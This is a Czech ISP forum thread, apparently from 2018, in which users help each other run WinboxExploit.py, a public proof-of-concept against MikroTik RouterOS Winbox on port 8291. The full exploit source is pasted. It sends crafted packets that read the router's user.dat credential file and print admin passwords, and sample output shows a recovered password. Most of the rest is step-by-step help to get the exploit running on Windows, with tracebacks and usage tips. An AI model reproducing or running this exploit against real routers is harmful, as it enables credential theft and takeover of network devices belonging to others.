právě to zkoušíme na všech možných verzích MK a ani za boha to nejde zkoušeli jsme 5.26 / 6.34 / 6.41.3 a nic nechápu to. Vždycky to jen vyhodí nějaký textový soubor kde není nic zajímavého.[/quote]
funkční na 6.28 až 6.42 včetně
na bugfix verzi 6.40.8 a 9 to také nefunguje.
❗️Toto je původní verze internetového fóra ISPforum.cz do února 2020 bez možnosti registrace nových uživatelů. Aktivní verzi fóra naleznete na adrese https://telekomunikace.cz
MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky
-
Dalibor Toman
- Příspěvky: 1246
- Registrován: 12 years ago
Robotvor píše:Právě to zkoušíme na všech možných verzích MK a ani za boha to nejde zkoušeli jsme 5.26 / 6.34 / 6.41.3 a nic nechápu to. Vždycky to jen vyhodí nějaký textový soubor kde není nic zajímavého.
Typicky vystup vypada takhle:
python3 WinboxExploit.py 1.2.3.4
User: admin
Pass:
User: admin
Pass:
User: admin
Pass: tajneheslo
--
a funguje na 6.28 a vys (mimo opravenych verzi). Pokud to zobrazuje neco jineho tak jde nejspis o chybove hlaseni (skript nefunguje v pythonu verze 2).
Zkousel jsem jen na linuxu (nejaky debian ve VirtualBoxu, protoze RedHat klony, ktery mame na serverech jedou jen na python2). Python by mozna fungoval i z Windows ?
0 x
Dalibor Toman píše:Robotvor píše:Právě to zkoušíme na všech možných verzích MK a ani za boha to nejde zkoušeli jsme 5.26 / 6.34 / 6.41.3 a nic nechápu to. Vždycky to jen vyhodí nějaký textový soubor kde není nic zajímavého.
Typicky vystup vypada takhle:
python3 WinboxExploit.py 1.2.3.4
User: admin
Pass:
User: admin
Pass:
User: admin
Pass: tajneheslo
--
a funguje na 6.28 a vys (mimo opravenych verzi). Pokud to zobrazuje neco jineho tak jde nejspis o chybove hlaseni (skript nefunguje v pythonu verze 2).
Zkousel jsem jen na linuxu (nejaky debian ve VirtualBoxu, protoze RedHat klony, ktery mame na serverech jedou jen na python2). Python by mozna fungoval i z Windows ?
V tom texťáku to vypíše tohle, dělám to na win10 a mám poslední verzi 3.7.0
#!/usr/bin/env python3
import socket
import sys
from extract_user import dump
a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
0x00, 0x00]
b = [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00]
if __name__ == "__main__":
try:
ip = sys.argv[1]
except:
print("Usage: python PoC.py [IP_ADDRESS]")
#Initialize Socket
s = socket.socket()
s.settimeout(3)
s.connect((ip, 8291))
#Convert to bytearray for manipulation
a = bytearray(a)
b = bytearray(b)
#Send hello and recieve the sesison id
s.send(a)
d = bytearray(s.recv(1024))
#Replace the session id in template
b[19] = d[38]
#Send the edited response
s.send(b)
d = bytearray(s.recv(1024))
#Get results
print(ip)
dump(d[55:])
0 x
-
Dalibor Toman
- Příspěvky: 1246
- Registrován: 12 years ago
Robotvor píše:
V tom texťáku to vypíše tohle, dělám to na win10 a mám poslední verzi 3.7.0
#!/usr/bin/env python3
import socket
import sys
from extract_user import dump
ale to vypada jako kod toho skriptu Winboxexploit.py. Cili soubor se nespustil ale vytiskl.
Jak ho na tech Windows spoustis?
0 x
Dalibor Toman píše:Robotvor píše:
V tom texťáku to vypíše tohle, dělám to na win10 a mám poslední verzi 3.7.0
#!/usr/bin/env python3
import socket
import sys
from extract_user import dump
ale to vypada jako kod toho skriptu Winboxexploit.py. Cili soubor se nespustil ale vytiskl.
Jak ho na tech Windows spoustis?
Ano přesně tak je to obsaho toho scriptu.
Spouštím ho tak, že pře totalcommander najedu do té složky kde je uložený a tam si pustím příkazový řádek a v něm pak zadám příkaz.
0 x
V tom texťáku to vypíše tohle, dělám to na win10 a mám poslední verzi 3.7.0
#!/usr/bin/env python3
import socket
import sys
from extract_user import dump
a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
Toto je jenom ale script...
1. musíš upravit proměnnou "ip" ip adresa "ip" je blbost logicky to nic nenajde.
2. až upravíš tu ip tak ten script musíš spustit buďto "F5" nebo Run > Run Module...
0 x
Pokud nejsi Linux guru a instaloval jsi ten lámací systém poprvé, doporučuji požádat důvěryhodného kolegu, aby to odzkoušel z odzkoušené instalace. Při instalaci Linux + milión balíčků na zelené louce číhají mnohá úskalí. Ušetříš si čas. Pokud jsi Linux guru, tak to nečti. mpcz, 7.sep.2018
0 x
pokud máš nainstalovaný python 3.x tak v příkazovém řádu stačí dát: py WinboxExploit.py x.x.x.x
1 x
jahoo píše:pokud máš nainstalovaný python 3.x tak v příkazovém řádu stačí dát: py WinboxExploit.py x.x.x.x
Takhle mě to taky nejde. Do toho scriptu se má ta IP doplnit kam ? dával jsem ji do těch hranatých závorek místo IP_ADDRESS ale bez výsledku
0 x
Robotvor píše:jahoo píše:pokud máš nainstalovaný python 3.x tak v příkazovém řádu stačí dát: py WinboxExploit.py x.x.x.x
Takhle mě to taky nejde. Do toho scriptu se má ta IP doplnit kam ? dával jsem ji do těch hranatých závorek místo IP_ADDRESS ale bez výsledku
Do scriptu nic nedoplňuješ, místo x.x.x.x napíšeš IP adresu
samozřejmě musíš v příkazovém řádku být v adresáři, kde je tento script
Jinak tento script nefunguje na verzi 6.42.7, kde to vypíše zpět pouze vyplněnou IP adresu
0 x
Takhle mě to taky nejde. Do toho scriptu se má ta IP doplnit kam ? dával jsem ji do těch hranatých závorek místo IP_ADDRESS ale bez výsledku
Kód: Vybrat vše
#Initialize Socket
s = socket.socket()
ip = 'IP ADRESA SEM DO TĚCHTO UVOZOVEK'
s.settimeout(3)
s.connect((ip, 8291))spustíš ten program (pyhton idle) dáš File > Open
Vybeřeš ten soubor wi..ploit.py
v něm upravíš tu IP viz výše.
a pak dáš RUN > RUN MODULE
0 x
jahoo píše:Robotvor píše:jahoo píše:pokud máš nainstalovaný python 3.x tak v příkazovém řádu stačí dát: py WinboxExploit.py x.x.x.x
Takhle mě to taky nejde. Do toho scriptu se má ta IP doplnit kam ? dával jsem ji do těch hranatých závorek místo IP_ADDRESS ale bez výsledku
Do scriptu nic nedoplňuješ, místo x.x.x.x napíšeš IP adresu
samozřejmě musíš v příkazovém řádku být v adresáři, kde je tento script
Jinak tento script nefunguje na verzi 6.42.7, kde to vypíše zpět pouze vyplněnou IP adresu
c:\Users\info\Desktop\Mikrotik exploit\WinboxExploit-master>WinboxExploit.py xx.99.147.xx
Usage: python PoC.py [IP_ADDRESS]
Traceback (most recent call last):
File "C:\Users\info\Desktop\Mikrotik exploit\WinboxExploit-master\WinboxExploit.py", line 43, in <module>
s.connect((ip, 8291))
NameError: name 'ip' is not defined
0 x
Robotvor píše:jahoo píše:Robotvor píše:
Takhle mě to taky nejde. Do toho scriptu se má ta IP doplnit kam ? dával jsem ji do těch hranatých závorek místo IP_ADDRESS ale bez výsledku
Do scriptu nic nedoplňuješ, místo x.x.x.x napíšeš IP adresu
samozřejmě musíš v příkazovém řádku být v adresáři, kde je tento script
Jinak tento script nefunguje na verzi 6.42.7, kde to vypíše zpět pouze vyplněnou IP adresu
c:\Users\info\Desktop\Mikrotik exploit\WinboxExploit-master>WinboxExploit.py xx.99.147.xx
Usage: python PoC.py [IP_ADDRESS]
Traceback (most recent call last):
File "C:\Users\info\Desktop\Mikrotik exploit\WinboxExploit-master\WinboxExploit.py", line 43, in <module>
s.connect((ip, 8291))
NameError: name 'ip' is not defined
A mas winbox na porte 8291???
0 x
KoZLiCeK píše:Robotvor píše:jahoo píše:
Do scriptu nic nedoplňuješ, místo x.x.x.x napíšeš IP adresu
samozřejmě musíš v příkazovém řádku být v adresáři, kde je tento script
Jinak tento script nefunguje na verzi 6.42.7, kde to vypíše zpět pouze vyplněnou IP adresu
c:\Users\info\Desktop\Mikrotik exploit\WinboxExploit-master>WinboxExploit.py xx.99.147.xx
Usage: python PoC.py [IP_ADDRESS]
Traceback (most recent call last):
File "C:\Users\info\Desktop\Mikrotik exploit\WinboxExploit-master\WinboxExploit.py", line 43, in <module>
s.connect((ip, 8291))
NameError: name 'ip' is not defined
A mas winbox na porte 8291???
Ano
0 x
-
Dalibor Toman
- Příspěvky: 1246
- Registrován: 12 years ago
Robotvor píše:c:\Users\info\Desktop\Mikrotik exploit\WinboxExploit-master>WinboxExploit.py xx.99.147.xx
Usage: python PoC.py [IP_ADDRESS]
Traceback (most recent call last):
File "C:\Users\info\Desktop\Mikrotik exploit\WinboxExploit-master\WinboxExploit.py", line 43, in <module>
s.connect((ip, 8291))
NameError: name 'ip' is not defined
radek
Usage: ...
skript vypise pokud prvni argument neexistuje (nevim kdy jeste jindy presne vyvola cteni z argv[1] v pythonu vyjimku). I kdyz se to stane tak skript pokracuje dal a logicky musi pokus o pripojeni selhat, protoze neni kam se pripojit.
Takze pokud jsi opravdu zadal na command linu IPcko a presto to vypsalo ten Usage ... radek tak mas nejaky divny problem s operacnim systemem/pythonem. Jak jsem se letmo dival na provozovani pythonu pod Windows - musi se python engine ne uplne trivialne instalovat...
0 x